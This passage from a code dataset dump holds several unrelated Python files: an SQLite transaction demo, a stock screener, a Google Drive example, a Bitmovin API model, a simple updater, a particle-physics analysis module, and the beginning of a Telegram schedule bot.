sqlite3.connect(db_filename) as conn1:\n print('Before changes:')\n display_table(conn1)\n\n cursor1 = conn1.cursor()\n cursor1.execute(\"\"\"\ninsert into images (name, size, date) values ('JournalDev.png', 2000, '2020-02-20'); \"\"\"\n )\n print('\\nAfter changes in conn1:')\n display_table(conn1)\n\n print('\\nBefore commit:')\n with sqlite3.connect(db_filename) as conn2:\n display_table(conn2)\n\n # Commit from the first connection\n conn1.commit()\n print('\\nAfter commit:')\n with sqlite3.connect(db_filename) as conn3:\n display_table(conn3)\n\n cursor1.execute(\n \"\"\" insert into images (name, size, date) values ('Hello.png', 200, '2020-01-18'); \"\"\"\n )\n print('\\nBefore commit:')\n with sqlite3.connect(db_filename) as conn2:\n display_table(conn2)\n\n # Revert to changes before conn1's commit\n conn1.rollback()\n print('\\nAfter connection 1 rollback:')\n with sqlite3.connect(db_filename) as conn4:\n display_table(conn4)\n\n\n'''удаление для реализации повторного запуска (добавления данных)'''\n\nwith sqlite3.connect(db_filename) as conn5:\n cursor5 = conn5.cursor()\n cursor5.execute(\"\"\"delete from images where name='JournalDev.png'; \"\"\" )\n conn5.commit()\n print('\\nAfter delete in conn5:')\n display_table(conn5)\n\n","sub_path":"Demo-itmo/mod_BD/SQLite_demo/demo02/sqlite_02tran.py","file_name":"sqlite_02tran.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407203565","text":"import pandas as pd\nimport pandas_datareader as web\nfrom pandas_datareader import data\nimport math\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom datetime import datetime, timedelta\nfrom condition import *\nfrom finviz.screener import Screener\n\n# Stage 2 uptrend condition:\n# 1,2,4,5: current price > 50-day > 150-day MA > 200-day MA\n# 6,7: current price > 1.3*52weeklow and 0.75*52weekhigh < current price < 1.25*52weekhigh\n# 3: 200-day MA line is trending up for 4-5 months\ndef stock_screen(scanDate):\n\n price_list = []\n bought_date = []\n stocks_worth_buying = []\n futu_list = []\n stocks_error = []\n count_good = 0\n count_bad = 0\n count_error = 0\n\n filters = ['sh_curvol_o200', 'sh_price_o10', 'ta_highlow52w_a30h', 'ta_sma200_sa50', 'ta_sma50_pa']\n stock_list = Screener(filters=filters, table='Performance')\n symbols = []\n for stock in stock_list:\n symbols.append(stock['Ticker'])\n\n todayDate = scanDate\n endDate = todayDate - timedelta(days = 1)\n startDate = endDate - timedelta(days = 365)\n print('Scan date: ',endDate.strftime('%Y-%m-%d'))\n\n for i in range(len(symbols)):\n try:\n df = web.DataReader(symbols[i], 'yahoo', startDate.strftime('%Y-%m-%d'), endDate.strftime('%Y-%m-%d'))\n \n # get data\n df['MovingAverage200'] = df['Close'].rolling(window=200).mean()\n ma200_increasing = df['MovingAverage200'].tolist()\n current_price = float(df['Close'][-1])\n ma50 = MA(df,50,'Close')[-1]\n ma150 = MA(df,150,'Close')[-1]\n ma200 = MA(df,200,'Close')[-1]\n low52week=LLV(df,252)\n high52week=HHV(df,252)\n MACD_line, MACD_Signal_line = calculate_macd(df, 'Close', 26, 12, 9)\n\n print(f'Stock: {symbols[i]}')\n print(f'Current price: {current_price}')\n print(f'ma50: {ma50}')\n print(f'ma150: {ma150}')\n print(f'ma200: {ma200}')\n print(f'low52week: {low52week}')\n print(f'high52week: {high52week}')\n\n if condition_1245(current_price,ma50,ma150,ma200) and condition_67(current_price,low52week,high52week) and condition_3(ma200_increasing) and vol_range(df) and VCP_Detection(df,current_price):\n\n print('Good')\n count_good=count_good+1\n stocks_worth_buying.append(symbols[i])\n futu_list.append('31#' + symbols[i])\n bought_date.append(scanDate)\n price_list.append(current_price)\n \n else:\n print('Bad')\n count_bad=count_bad+1\n\n except:\n print(f'Stock: {symbols[i]}')\n print(\"Something's wrong\")\n count_error=count_error+1\n stocks_error.append(symbols[i])\n\n\n futuexport = pd.DataFrame(futu_list)\n filepath = 'output\\Stocks worth buying_{}_{}.csv'.format(cap,endDate.strftime('%Y-%m-%d'))\n futuexport.to_csv(filepath, index = False)\n print(stocks_worth_buying)\n print(f'Scanning of {scanDate} is complete')\n return stocks_worth_buying","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"284656604","text":"\"\"\"\nThis example reads the content of a directory and writes the files from the\ndirectory to the console.\n\"\"\"\n\nimport gdrive_tools.gdrive_tools as gt\nimport gdrive_tools.google_auth as ga\nfrom gdrive_tools.google_filetypes import GoogleFiletypes\n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/documents', 'https://www.googleapis.com/auth/drive']\n\ndef main():\n\n # Create the google auth wrapper, which wraps the authentication\n # process. You only need to specify the needed scopes here.\n auth = ga.GoogleAuth(SCOPES)\n\n # Obtain the credentials, after the authentication process finished.\n creds = auth.createCredentials()\n\n # Create the google drive tools client with your local credentials.\n googleDriveTools = gt.GDriveTools(creds)\n\n # For the demonstation of the readDirectory() method, we want to\n # create a file called 'sample' in the 'simple/test' directory on our\n # local drive first.\n destinationPath = 'simple/test'\n docname = 'sample'\n googleDriveTools.createFile(destinationPath, docname, GoogleFiletypes.DOCUMENT)\n\n # Now we want to read the content of the 'simple/test' directory.\n directoryContent = googleDriveTools.readDirectory(destinationPath)\n\n print(f\"The directory has the following ID: {directoryContent['directory_id']}\")\n print(\"The following files are currently stored inside the directory:\\n\")\n for currentFile in directoryContent['files']:\n print(f\"Filename:\\t{currentFile['name']}\")\n print(f\"File Id:\\t{currentFile['id']}\")\n print(f\"Mime Type:\\t{currentFile['type']}\\n\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/read_directory.py","file_name":"read_directory.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"280691560","text":"# coding: utf-8\n\nfrom enum import Enum\nfrom datetime import date\nfrom six import string_types, iteritems\nfrom bitmovin_api_sdk.common.poscheck import poscheck_model\nimport pprint\nimport six\n\n\nclass EncodingStatistics(object):\n @poscheck_model\n def __init__(self,\n date_=None,\n bytes_encoded=None,\n time_encoded=None,\n bytes_egress=None):\n # type: (date, int, int, int) -> None\n\n self._date = None\n self._bytes_encoded = None\n self._time_encoded = None\n self._bytes_egress = None\n self.discriminator = None\n\n if date_ is not None:\n self.date = date_\n if bytes_encoded is not None:\n self.bytes_encoded = bytes_encoded\n if time_encoded is not None:\n self.time_encoded = time_encoded\n if bytes_egress is not None:\n self.bytes_egress = bytes_egress\n\n @property\n def openapi_types(self):\n types = {\n 'date': 'date',\n 'bytes_encoded': 'int',\n 'time_encoded': 'int',\n 'bytes_egress': 'int'\n }\n\n return types\n\n @property\n def attribute_map(self):\n attributes = {\n 'date': 'date',\n 'bytes_encoded': 'bytesEncoded',\n 'time_encoded': 'timeEncoded',\n 'bytes_egress': 'bytesEgress'\n }\n return attributes\n\n @property\n def date(self):\n # type: () -> date\n \"\"\"Gets the date of this EncodingStatistics.\n\n Date, format. yyyy-MM-dd (required)\n\n :return: The date of this EncodingStatistics.\n :rtype: date\n \"\"\"\n return self._date\n\n @date.setter\n def date(self, date_):\n # type: (date) -> None\n \"\"\"Sets the date of this EncodingStatistics.\n\n Date, format. yyyy-MM-dd (required)\n\n :param date_: The date of this EncodingStatistics.\n :type: date\n \"\"\"\n\n if date_ is not None:\n if not isinstance(date_, date):\n raise TypeError(\"Invalid type for `date`, type has to be `date`\")\n\n self._date = date_\n\n @property\n def bytes_encoded(self):\n # type: () -> int\n \"\"\"Gets the bytes_encoded of this EncodingStatistics.\n\n Bytes encoded for this encoding. (required)\n\n :return: The bytes_encoded of this EncodingStatistics.\n :rtype: int\n \"\"\"\n return self._bytes_encoded\n\n @bytes_encoded.setter\n def bytes_encoded(self, bytes_encoded):\n # type: (int) -> None\n \"\"\"Sets the bytes_encoded of this EncodingStatistics.\n\n Bytes encoded for this encoding. (required)\n\n :param bytes_encoded: The bytes_encoded of this EncodingStatistics.\n :type: int\n \"\"\"\n\n if bytes_encoded is not None:\n if not isinstance(bytes_encoded, int):\n raise TypeError(\"Invalid type for `bytes_encoded`, type has to be `int`\")\n\n self._bytes_encoded = bytes_encoded\n\n @property\n def time_encoded(self):\n # type: () -> int\n \"\"\"Gets the time_encoded of this EncodingStatistics.\n\n Time in seconds encoded for this encoding. (required)\n\n :return: The time_encoded of this EncodingStatistics.\n :rtype: int\n \"\"\"\n return self._time_encoded\n\n @time_encoded.setter\n def time_encoded(self, time_encoded):\n # type: (int) -> None\n \"\"\"Sets the time_encoded of this EncodingStatistics.\n\n Time in seconds encoded for this encoding. (required)\n\n :param time_encoded: The time_encoded of this EncodingStatistics.\n :type: int\n \"\"\"\n\n if time_encoded is not None:\n if not isinstance(time_encoded, int):\n raise TypeError(\"Invalid type for `time_encoded`, type has to be `int`\")\n\n self._time_encoded = time_encoded\n\n @property\n def bytes_egress(self):\n # type: () -> int\n \"\"\"Gets the bytes_egress of this EncodingStatistics.\n\n Egress output generated by file transfers in bytes (required)\n\n :return: The bytes_egress of this EncodingStatistics.\n :rtype: int\n \"\"\"\n return self._bytes_egress\n\n @bytes_egress.setter\n def bytes_egress(self, bytes_egress):\n # type: (int) -> None\n \"\"\"Sets the bytes_egress of this EncodingStatistics.\n\n Egress output generated by file transfers in bytes (required)\n\n :param bytes_egress: The bytes_egress of this EncodingStatistics.\n :type: int\n \"\"\"\n\n if bytes_egress is not None:\n if not isinstance(bytes_egress, int):\n raise TypeError(\"Invalid type for `bytes_egress`, type has to be `int`\")\n\n self._bytes_egress = bytes_egress\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if value is None:\n continue\n if isinstance(value, list):\n if len(value) == 0:\n continue\n result[self.attribute_map.get(attr)] = [y.value if isinstance(y, Enum) else y for y in [x.to_dict() if hasattr(x, \"to_dict\") else x for x in value]]\n elif hasattr(value, \"to_dict\"):\n result[self.attribute_map.get(attr)] = value.to_dict()\n elif isinstance(value, Enum):\n result[self.attribute_map.get(attr)] = value.value\n elif isinstance(value, dict):\n result[self.attribute_map.get(attr)] = {k: (v.to_dict() if hasattr(v, \"to_dict\") else v) for (k, v) in value.items()}\n else:\n result[self.attribute_map.get(attr)] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, EncodingStatistics):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"bitmovin_api_sdk/models/encoding_statistics.py","file_name":"encoding_statistics.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"284929767","text":"import urllib3\nimport zipfile\nimport os\nimport shutil\n\nhttp = urllib3.PoolManager()\n\nclass Updater(object):\n def __init__(self, host, urlVersion, urlZip):\n self.host = host #e.g. http://localhost\n self.urlVersion = urlVersion #e.g. /version.txt\n self.urlZip = urlZip #e.g. /latest.zip\n\n def check(self, currentVersion, clear=False, clearPath=''): #If the is a newer version, it returns True, otherwise False. Also returns False when error occured.\n try:\n if clear:\n for el in os.listdir(clearPath):\n if el is not str(currentVersion):\n fullpath = os.path.join(clearPath, el)\n if os.path.isdir(fullpath):\n shutil.rmtree(fullpath)\n else:\n os.remove(fullpath)\n\n self.latestVersion = float(http.request('GET', self.host + self.urlVersion)._body)\n if self.latestVersion > currentVersion:\n return True\n else:\n return False\n except:\n raise\n\n\n def download(self, path): #Returns True if downloaded, else returns False.\n try:\n with open(path, 'wb') as f:\n f.write(http.request('GET', self.urlZip).data)\n return True\n except:\n return False\n\n\n def install(self, path, zipPath, remove=True): #Returns True if instaled successfully. Returns False when error occured.\n try:\n zip = zipfile.ZipFile(zipPath, 'r')\n zip.extractall(os.path.join(path, str(self.latestVersion)))\n zip.close()\n\n if remove is True:\n os.remove(zipPath)\n\n return os.path.join(path, str(self.latestVersion))\n except:\n raise\n\n def run(self, exePath, exit=True): #Returns False if error occured. Else returns True.\n try:\n os.startfile(exePath)\n if exit is True:\n quit()\n return True\n except Exception:\n return False\n\nif __name__ == \"__main__\":\n updater = Updater('localhost', '/version.txt', '/latest.zip')\n print(updater.check(0.1, 1, 'temp', 0.2))\n print(updater.download('new.zip'))\n path = updater.install('temp', 'new.zip')\n print(path)\n print(updater.run(os.path.join(path, 'hello.exe')))\n","sub_path":"updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182468178","text":"import ROOT\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection \nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\n\nfrom TreeProducerMuEle import *\n\n\nclass declareVariables(TreeProducerMuEle):\n \n def __init__(self, name):\n\n super(declareVariables, self).__init__(name)\n\n\nclass MuEleProducer(Module):\n\n def __init__(self, name, DataType):\n\n self.name = name\n self.out = declareVariables(name)\n\n if DataType=='data':\n self.isData = True\n else:\n self.isData = False\n\n self.Nocut = 0\n self.Trigger = 1\n self.GoodMuons = 2\n self.GoodElectrons = 3\n self.GoodDiLepton = 4\n self.TotalWeighted = 15\n\n def beginJob(self):\n pass\n\n def endJob(self):\n self.out.outputfile.Write()\n self.out.outputfile.Close()\n# pass\n\n def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n pass\n\n\n def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree): \n pass\n \n def analyze(self, event):\n \"\"\"process event, return True (go to next module) or False (fail, go to next event)\"\"\"\n\n# electrons = Collection(event, \"Electron\")\n\n\n #####################################\n self.out.h_cutflow.Fill(self.Nocut)\n #####################################\n\n #####################################\n if not self.isData:\n self.out.h_cutflow.Fill(self.TotalWeighted, event.genWeight)\n else:\n self.out.h_cutflow.Fill(self.TotalWeighted, 1.)\n #####################################\n\n if not event.HLT_IsoMu27:\n return False\n\n #####################################\n self.out.h_cutflow.Fill(self.Trigger)\n #####################################\n\n idx_goodmuons = []\n \n for imuon in range(event.nMuon):\n\n if event.Muon_pt[imuon] < 28: continue\n if abs(event.Muon_eta[imuon]) > 2.4: continue\n if abs(event.Muon_dz[imuon]) > 0.2: continue\n if abs(event.Muon_dxy[imuon]) > 0.045: continue\n if not event.Muon_mediumId[imuon]: continue\n\n idx_goodmuons.append(imuon)\n\n\n if len(idx_goodmuons)==0:\n return False\n\n #####################################\n self.out.h_cutflow.Fill(self.GoodMuons)\n #####################################\n\n idx_goodelectrons = []\n \n for ielectron in range(event.nElectron):\n\n if event.Electron_pt[ielectron] < 20: continue\n if abs(event.Electron_eta[ielectron]) > 2.1: continue\n if abs(event.Electron_dz[ielectron]) > 0.2: continue\n if abs(event.Electron_dxy[ielectron]) > 0.045: continue\n if event.Electron_convVeto[ielectron] !=1: continue\n if ord(event.Electron_lostHits[ielectron]) > 1: continue\n# if event.Electron_mvaFall17Iso_WP80[ielectron] < 0.5: continue\n\n idx_goodelectrons.append(ielectron)\n\n\n if len(idx_goodelectrons)==0:\n return False\n\n #####################################\n self.out.h_cutflow.Fill(self.GoodElectrons)\n #####################################\n\n\n \n # to check dR matching\n\n electrons = Collection(event, \"Electron\")\n muons = Collection(event, \"Muon\")\n dileptons = []\n\n for idx1 in idx_goodmuons:\n for idx2 in idx_goodelectrons:\n \n if idx1 >= idx2: continue\n\n dR = muons[idx1].p4().DeltaR(electrons[idx2].p4())\n if dR < 0.5: continue\n \n muon_reliso = event.Muon_pfRelIso04_all[idx1]\n electron_reliso = event.Electron_pfRelIso03_all[idx2]\n\n # muon first\n _dilepton = DiLeptonBasicClass(idx1, event.Muon_pt[idx1], muon_reliso,\n idx2, event.Electron_pt[idx2], electron_reliso)\n\n dileptons.append(_dilepton)\n\n if len(dileptons)==0:\n return False\n\n\n #####################################\n self.out.h_cutflow.Fill(self.GoodDiLepton)\n #####################################\n\n dilepton = bestDiLepton(dileptons)\n\n# print 'chosen tau1 (idx, pt) = ', dilepton.tau1_idx, dilepton.tau1_pt, 'check', taus[dilepton.tau1_idx].p4().Pt()\n# print 'chosen tau2 (idx, pt) = ', dilepton.tau2_idx, dilepton.tau2_pt, 'check', taus[dilepton.tau2_idx].p4().Pt()\n\n jetIds = []\n\n jets = Collection(event, \"Jet\")\n# jets = filter(self.jetSel,jets):\n\n nfjets = 0\n ncjets = 0\n nbtag = 0\n\n for ijet in range(event.nJet):\n\n# for j in filter(self.jetSel,jets):\n\n\n if event.Jet_pt[ijet] < 30: \n continue\n\n if abs(event.Jet_eta[ijet]) > 4.7: \n continue\n\n dR = muons[dilepton.tau1_idx].p4().DeltaR(jets[ijet].p4())\n if dR < 0.5: \n continue\n\n dR = electrons[dilepton.tau2_idx].p4().DeltaR(jets[ijet].p4())\n\n if dR < 0.5: \n continue\n\n# print '#', ijet, 'pt = ', jets[ijet].p4().Pt(), event.Jet_pt[ijet]\n\n jetIds.append(ijet)\n \n if abs(event.Jet_eta[ijet]) > 2.4:\n nfjets += 1\n else:\n ncjets += 1\n\n if event.Jet_btagCSVV2[ijet] > 0.8838:\n nbtag += 1\n \n \n\n# eventSum = ROOT.TLorentzVector()\n#\n# for lep in electrons :\n# eventSum += lep.p4()\n# for lep in electrons :\n# eventSum += lep.p4()\n# for j in filter(self.jetSel,jets):\n# eventSum += j.p4()\n\n\n # electron\n self.out.pt_2[0] = event.Electron_pt[dilepton.tau1_idx]\n self.out.eta_2[0] = event.Electron_eta[dilepton.tau1_idx]\n self.out.phi_2[0] = event.Electron_phi[dilepton.tau1_idx]\n self.out.mass_2[0] = event.Electron_mass[dilepton.tau1_idx]\n self.out.dxy_2[0] = event.Electron_dxy[dilepton.tau1_idx]\n self.out.dz_2[0] = event.Electron_dz[dilepton.tau1_idx] \n self.out.q_2[0] = event.Electron_charge[dilepton.tau1_idx]\n self.out.pfRelIso03_all_2[0] = event.Electron_pfRelIso03_all[dilepton.tau1_idx]\n self.out.cutBased_2[0] = event.Electron_cutBased[dilepton.tau1_idx]\n self.out.mvaFall17Iso_2[0] = event.Electron_mvaFall17Iso[dilepton.tau1_idx]\n self.out.mvaFall17Iso_WP80_2[0] = event.Electron_mvaFall17Iso_WP80[dilepton.tau1_idx]\n self.out.mvaFall17Iso_WP90_2[0] = event.Electron_mvaFall17Iso_WP90[dilepton.tau1_idx]\n self.out.mvaFall17Iso_WPL_2[0] = event.Electron_mvaFall17Iso_WPL[dilepton.tau1_idx]\n\n\n\n\n if not self.isData:\n self.out.genPartFlav_1[0] = ord(event.Muon_genPartFlav[dilepton.tau1_idx])\n self.out.genPartFlav_2[0] = ord(event.Electron_genPartFlav[dilepton.tau2_idx])\n\n\n # event weights\n self.out.run[0] = event.run\n self.out.luminosityBlock[0] = event.luminosityBlock\n self.out.event[0] = event.event & 0xffffffffffffffff\n self.out.MET_pt[0] = event.MET_pt\n self.out.MET_phi[0] = event.MET_phi\n self.out.PuppiMET_pt[0] = event.PuppiMET_pt\n self.out.PuppiMET_phi[0] = event.PuppiMET_phi\n self.out.MET_significance[0] = event.MET_significance\n self.out.MET_covXX[0] = event.MET_covXX\n self.out.MET_covXY[0] = event.MET_covXY\n self.out.MET_covYY[0] = event.MET_covYY\n self.out.fixedGridRhoFastjetAll[0] = event.fixedGridRhoFastjetAll\n self.out.PV_npvs[0] = event.PV_npvs\n self.out.PV_npvsGood[0] = event.PV_npvsGood\n\n if not self.isData:\n self.out.GenMET_pt[0] = event.GenMET_pt\n self.out.GenMET_phi[0] = event.GenMET_phi\n self.out.Pileup_nPU[0] = event.Pileup_nPU\n self.out.Pileup_nTrueInt[0] = event.Pileup_nTrueInt\n self.out.genWeight[0] = event.genWeight\n self.out.LHE_Njets[0] = event.LHE_Njets\n\n\n self.out.jpt_1[0] = -9.\n self.out.jeta_1[0] = -9.\n self.out.jphi_1[0] = -9.\n self.out.jcsvv2_1[0] = -9.\n self.out.jdeepb_1[0] = -9.\n\n self.out.jpt_2[0] = -9.\n self.out.jeta_2[0] = -9.\n self.out.jphi_2[0] = -9.\n self.out.jcsvv2_2[0] = -9.\n self.out.jdeepb_2[0] = -9.\n\n\n if len(jetIds)>0:\n self.out.jpt_1[0] = event.Jet_pt[jetIds[0]]\n self.out.jeta_1[0] = event.Jet_eta[jetIds[0]]\n self.out.jphi_1[0] = event.Jet_phi[jetIds[0]]\n self.out.jcsvv2_1[0] = event.Jet_btagCSVV2[jetIds[0]]\n self.out.jdeepb_1[0] = event.Jet_btagDeepB[jetIds[0]]\n\n if len(jetIds)>1:\n self.out.jpt_2[0] = event.Jet_pt[jetIds[1]]\n self.out.jeta_2[0] = event.Jet_eta[jetIds[1]]\n self.out.jphi_2[0] = event.Jet_phi[jetIds[1]]\n self.out.jcsvv2_2[0] = event.Jet_btagCSVV2[jetIds[1]]\n self.out.jdeepb_2[0] = event.Jet_btagDeepB[jetIds[1]]\n\n\n self.out.njets[0] = len(jetIds)\n self.out.nfjets[0] = nfjets\n self.out.ncjets[0] = ncjets\n self.out.nbtag[0] = nbtag\n\n self.out.pfmt_1[0] = math.sqrt( 2 * self.out.pt_1[0] * self.out.MET_pt[0] * ( 1 - math.cos(deltaPhi(self.out.phi_1[0], self.out.MET_phi[0])) ) );\n self.out.pfmt_2[0] = math.sqrt( 2 * self.out.pt_2[0] * self.out.MET_pt[0] * ( 1 - math.cos(deltaPhi(self.out.phi_2[0], self.out.MET_phi[0])) ) );\n\n self.out.m_vis[0] = (muons[dilepton.tau1_idx].p4() + electrons[dilepton.tau2_idx].p4()).M()\n self.out.pt_tt[0] = (muons[dilepton.tau1_idx].p4() + electrons[dilepton.tau2_idx].p4()).Pt()\n \n self.out.dR_ll[0] = muons[dilepton.tau1_idx].p4().DeltaR(electrons[dilepton.tau2_idx].p4())\n self.out.dphi_ll[0] = deltaPhi(self.out.phi_1[0], self.out.phi_2[0])\n\n\n # pzeta calculation\n\n leg1 = ROOT.TVector3(muons[dilepton.tau1_idx].p4().Px(), muons[dilepton.tau1_idx].p4().Py(), 0.)\n leg2 = ROOT.TVector3(electrons[dilepton.tau2_idx].p4().Px(), electrons[dilepton.tau2_idx].p4().Py(), 0.)\n \n# print 'leg1 px,py,pz = ', taus[dilepton.tau1_idx].p4().Px(), taus[dilepton.tau1_idx].p4().Py(), '0'\n# print 'leg2 px,py,pz = ', taus[dilepton.tau2_idx].p4().Px(), taus[dilepton.tau2_idx].p4().Py(), '0'\n\n met_tlv = ROOT.TLorentzVector()\n met_tlv.SetPxPyPzE(self.out.MET_pt[0]*math.cos(self.out.MET_phi[0]), \n self.out.MET_pt[0]*math.cos(self.out.MET_phi[0]),\n 0, \n self.out.MET_pt[0])\n\n# print self.out.MET_pt[0]*math.cos(self.out.MET_phi[0]), self.out.MET_pt[0]*math.cos(self.out.MET_phi[0]), '0', self.out.MET_pt[0]\n\n metleg = met_tlv.Vect()\n zetaAxis = ROOT.TVector3(leg1.Unit() + leg2.Unit()).Unit()\n pZetaVis_ = leg1*zetaAxis + leg2*zetaAxis\n pZetaMET_ = metleg*zetaAxis\n \n# print 'pZetaVis = ', pZetaVis_, ' pZetaMET = ', pZetaMET_ \n\n self.out.pzetamiss[0] = pZetaMET_\n self.out.pzetavis[0] = pZetaVis_\n self.out.pzeta_disc[0] = pZetaMET_ - 0.5*pZetaVis_\n\n\n # extra lepton vetos\n self.out.extramuon_veto[0], self.out.extraelec_veto[0], self.out.dilepton_veto[0] = extraLeptonVetos(event, [dilepton.tau1_idx], [dilepton.tau2_idx], self.name)\n\n self.out.isData[0] = self.isData\n\n self.out.tree.Fill() \n\n return True\n","sub_path":"MuEleModule.py","file_name":"MuEleModule.py","file_ext":"py","file_size_in_byte":12867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548897457","text":"##############\n##Библиотеки##\n##############\nimport sqlite3\nimport logging\nimport aiogram.utils.markdown as md\nimport keyboard as keyboard\nimport datetime\nimport calendar\nimport lxml\nimport time\nimport random\nimport asyncio\nimport aioschedule\nimport pandas as pd\nimport schedule\nimport subprocess\nimport emoji\nimport os\n\nfrom aiogram.types import InputFile\nfrom aiogram import Bot, types, Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.utils import executor\nfrom aiogram.types import ReplyKeyboardRemove, ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton, ParseMode, Message\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.utils.helper import Helper, HelperMode, ListItem\nfrom config import bot_token, admin_id, admin2_id\nfrom datetime import date, timedelta\nfrom bs4 import BeautifulSoup\nfrom markdown import markdown\nfrom pprint import pprint\n\n\ndef steare():\n subprocess.Popen(['python3', 'take_resp.py'])\n subprocess.Popen(['python3', 'butify.py'])\n\n\n\n##############\n##Переменные##\n##############\nglobal key, chisl, x, y, cikl\n\nchisl = ''\nx = 0\ny = 0\ncikl = 0\nkey = 0\n\n###############\n##Логирование##\n###############\nlogging.basicConfig(level=logging.INFO)\n\n#############\n##Состояния##\n#############\nclass States(StatesGroup):\n group = State()\n setting = State()\n adm1 = State()\n adm1_set = State()\n sndmsg = State()\n fio = State()\n\n###############\n##Объект бота##\n###############\nbot = Bot(token=bot_token)\n\n############################\n##Диспетчер(Для хэндлеров)##\n############################\ndp = Dispatcher(bot, storage=MemoryStorage())\n\n############################\n##Даты и имена дней недели##\n############################\ntoday_week = datetime.datetime.today().isocalendar()[1]\ntoday_day = datetime.datetime.today().weekday()\ndays_naming = [\"Понедельник\",\"Вторник\",\"Среда\",\"Четверг\",\"Пятница\",\"Суббота\",\"Воскресенье\"]\ndays_naming_en = [\"monday\", \"tuesday\", \"wednesday\", \"thursday\", \"friday\",\"saturday\", \"sunday\"]\ntoday = date.today()\ncalendar.day_name[today.weekday()]\nnext_day = today_day + 1\nif next_day == 7:\n next_day = 0\n\n###################################################\n##Парсинг уведомления с главной страницы колледжа##\n###################################################\nasync def started():\n global message_for_see\n try:\n with open (f'/home/{os.getlogin()}/horde/info_{today.strftime(\"%d\")}.{today.strftime(\"%m\")}.{today.year}.html') as file:\n src1 = file.read()\n\n soup1 = BeautifulSoup(src1, \"lxml\")\n\n all_p = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p1 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p2_1 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p2_2 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p2 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p2_3 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p3 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# all_p4 = soup1.find(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\").find_next(\"p\")\n# message_for_see = f\"{all_p.get_text()}\\n{all_p1.get_text()}\\n{all_p2_1.get_text()}\\n{all_p2_2.get_text()}\\n\\n{all_p2_3.get_text()}\\n{all_p3.get_text()}\\n{all_p2.get_text()}\\n{all_p4.get_text()}\"\n message_for_see = f\"{all_p.get_text()}\"\n except Exception as ext:\n print(ext)\n\n#############################\n##База данных пользователей##\n#############################\nconn = sqlite3.connect('users_database.db')\ncur = conn.cursor()\ncur.execute('CREATE TABLE IF NOT EXISTS users(user_id INTEGER, group_number TEXT, notify_times TEXT)')\ncur.execute('CREATE TABLE IF NOT EXISTS prepods(user_id INTEGER, prep_name TEXT, notify_times TEXT)')\n\n#############################\n##База данных пользователей##\n#############################\ndbfile = InputFile(\"users_database.db\", filename=\"users_database.db\")\n\n################\n##Текущий день##\n################\nasync def week():\n global key\n global cikl\n global cikl1\n global key1\n if (today_week % 2 == 0):\n chisl = 'Числитель'\n else:\n chisl = 'Знаменатель'\n if (chisl == 'Знаменатель' and today_day==0):\n cikl = 0\n cikl1 = 6\n elif (chisl == 'Знаменатель' and today_day==1):\n cikl = 6\n cikl1 = 12\n elif (chisl == 'Знаменатель' and today_day==2): \n cikl = 12 \n cikl1 = 18\n elif (chisl == 'Знаменатель' and today_day==3):\n cikl = 18\n cikl1 = 24\n elif (chisl == 'Знаменатель' and today_day==4):\n cikl = 24\n cikl1 = 30\n elif (chisl == 'Знаменатель' and 